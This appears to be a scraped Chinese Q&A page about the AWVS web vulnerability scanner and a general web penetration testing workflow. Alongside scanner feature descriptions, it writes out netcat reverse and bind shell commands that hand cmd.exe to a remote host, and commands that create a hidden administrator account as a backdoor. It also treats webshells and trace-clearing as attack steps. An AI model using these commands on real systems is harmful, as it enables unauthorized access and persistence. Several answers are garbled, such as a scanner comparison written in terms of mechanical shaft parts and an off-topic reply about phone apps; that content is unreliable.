本文目录一览:
- 1、对网站群管理平台进行ZAP和AWVS模拟攻击发现的漏洞按STRIDE 模型分类,分别属于哪一种类型?具体如下:
- 2、AWVS介绍
- 3、awvs和nessus区别与相同点
- 4、happycrawler解析失败
- 5、web渗透是什么?
- 6、为什么AWVS无法自动登录到扫描站点?
对网站群管理平台进行ZAP和AWVS模拟攻击发现的漏洞按STRIDE 模型分类,分别属于哪一种类型?具体如下:
手机存在的漏洞其实有很多,腾讯玄武实验室最近就发现了一个漏洞叫做应用克隆
通过这个漏洞可以无限的去复制软件包括软件内的信息和文件
所以要及时的去用管家来保护手机的安全,软件需要更新的时候及时的升级更新
AWVS介绍
AWVS(Acunetix Web Vulnerability Scanner)简介
WVS(Web Vulnerability Scanner)是一个自动化的Web应用程序安全测试工具,它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。WVS可以通过检查SQL注入攻击漏洞、跨站脚本攻击漏洞等来审核Web应用程序的安全性。 它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。
AWVS功能介绍
WebScanner,核心功能,Web安全漏洞扫描
Site Crawler,爬虫功能,遍历站点目录结构
Target Finder,端口扫描,找出web服务器,80,443
Subdomain Scanner,子域名扫描器,利用DNS查询
Blind SQL Injector,盲注工具
HTTP Editor,http协议数据包编辑器
HTTP Sniffer,HTTP协议嗅探器
HTTP Fuzzer,模糊测试工具
Authentication Tester,Web认证破解工具
awvs和nessus区别与相同点
安装位置、安全性。
1、区别安装位置。awvs内外偏心块装于转轴上,有轴键者应将轴键装入键槽内再装外偏心块,将轴用挡圈装于转轴上;nessus内外偏心块装于转轴上,不用将轴用挡圈进行安装。
2、相同点安全性。awvs采用扫描网站漏洞系统增加网站安全性;.Nessus也是采用扫描系统漏洞来增加网站安全性。
happycrawler解析失败
通过向导的扫描
1、打开02虚拟机,打开网页,搜索127.0.0.1
2、然后打开01虚拟机,打开AWVS,点击图标进入工具页面,点击New Scan进入向导,输入靶机的URL地址,点击下一步;接下来提示你想要使用哪个扫描配置文件,默认情况下这里已经有好多种扫描配置文件了,可以指定具体目标的扫描配置文件。这里我们使用默认设置,单击下一步
3、AWVS对目标web进行初步探测,目标的banner信息、目标URL、目标操作系统、目标版本和语言…点击下一步
4、接下来都选用默认设置
5、点击Finish完成向导
6、进入对目标web进行扫描
7、爬网的步骤已经完成,发现一些漏洞和关于网站的所有敏感信息,点开漏洞右侧查看详细漏洞信息。
8、通过查看View HTTP headers查看Rwquest信息和Response信息
9、AWVS可以把发现的SQL盲注通过右键导出到Blind sqlinjector
10、首先配置好注入测试的选项,主要是指定数据库类型等,目前只支持MSSQL和MySQL两种类型。
11、切换到HTTP Request,手动指定注入的参数,选中要注入的参数的值部分,点击添加按钮,在点击播放按钮,AWVS就会自动进行SQ;注入的探测
通过附加工具的扫描
1、Ste Crawler 站点爬网工具。先点击Ste Crawler,在Start URL:列表框输入一个URL地址点击右侧的start,AWVS会把这个URL地址下的链接路径都扫描出来,结果会放在中间位置。如果web需要身份认证才能访问一些页面,在右侧login sequence:选择录制好的登录过程录像,AWVS就会自动登录web,进一步访问web页面。
2、Target Finder端口发现、服务发现扫描工具。先点击Target Finder,在IP Range里输入一个地址段,例:172.16.1.1-30,List of Ports里输入端口号,例:80,443,点击Start,就会对这一段IP的80和443端口进行扫描,如果发现了80和443端口,会继续扫描这些端口上的服务
3、Subdomain Scanner利用DNS进行域名解析工具,点击Subdomain Scanner,在Domain输入一个域名会扫出来这个域名下的子域以及主机名并解析出对应的IP地址
4、Blind SQL Injector sql注入功能,添写http的请求过程,在相应的参数位置添加注入点,awvs会自动进行sql注入探测,并获取数据信息
5、HTTP Editor 手动漏洞挖掘探测功能。
6、HTTP Sniffer 代理功能帧听功能 ,首先在configuration设置网卡帧听以及帧听端口。
7、设置好之后点击start,看到右上角的提示信息Running on poor 99
8、我们修改浏览器的代理配置为127.0.0.1的99端口,之后访问任何网站的操作都会被记录下来。
9、Authentication Tester 身份认证测试,Target URL to test指定需要身份认证的地址,Authentication method认证方法,指定基本HTTP认证还是WEB表单认证,Logon has failed if 指定身份认证成功或失败之后显示的信息。
10 引用内容、Compare Results 针对于收集不同用户登录扫描出来的结果放在一起进行比较,通过查看返回内容的差别,来判断访问控制上存在的缺陷和隐患
11、Web Services ,通过接口方式开发的web程序的扫描
web渗透是什么?
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp 4444
在内网主机上执行:
nc-e cmd.exe 公网主机ip4444
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p 4444 -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip4444
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
为什么AWVS无法自动登录到扫描站点?
登录有事需要验证码,有时awvs的UA会有特殊标记,网站识别了就会封ip的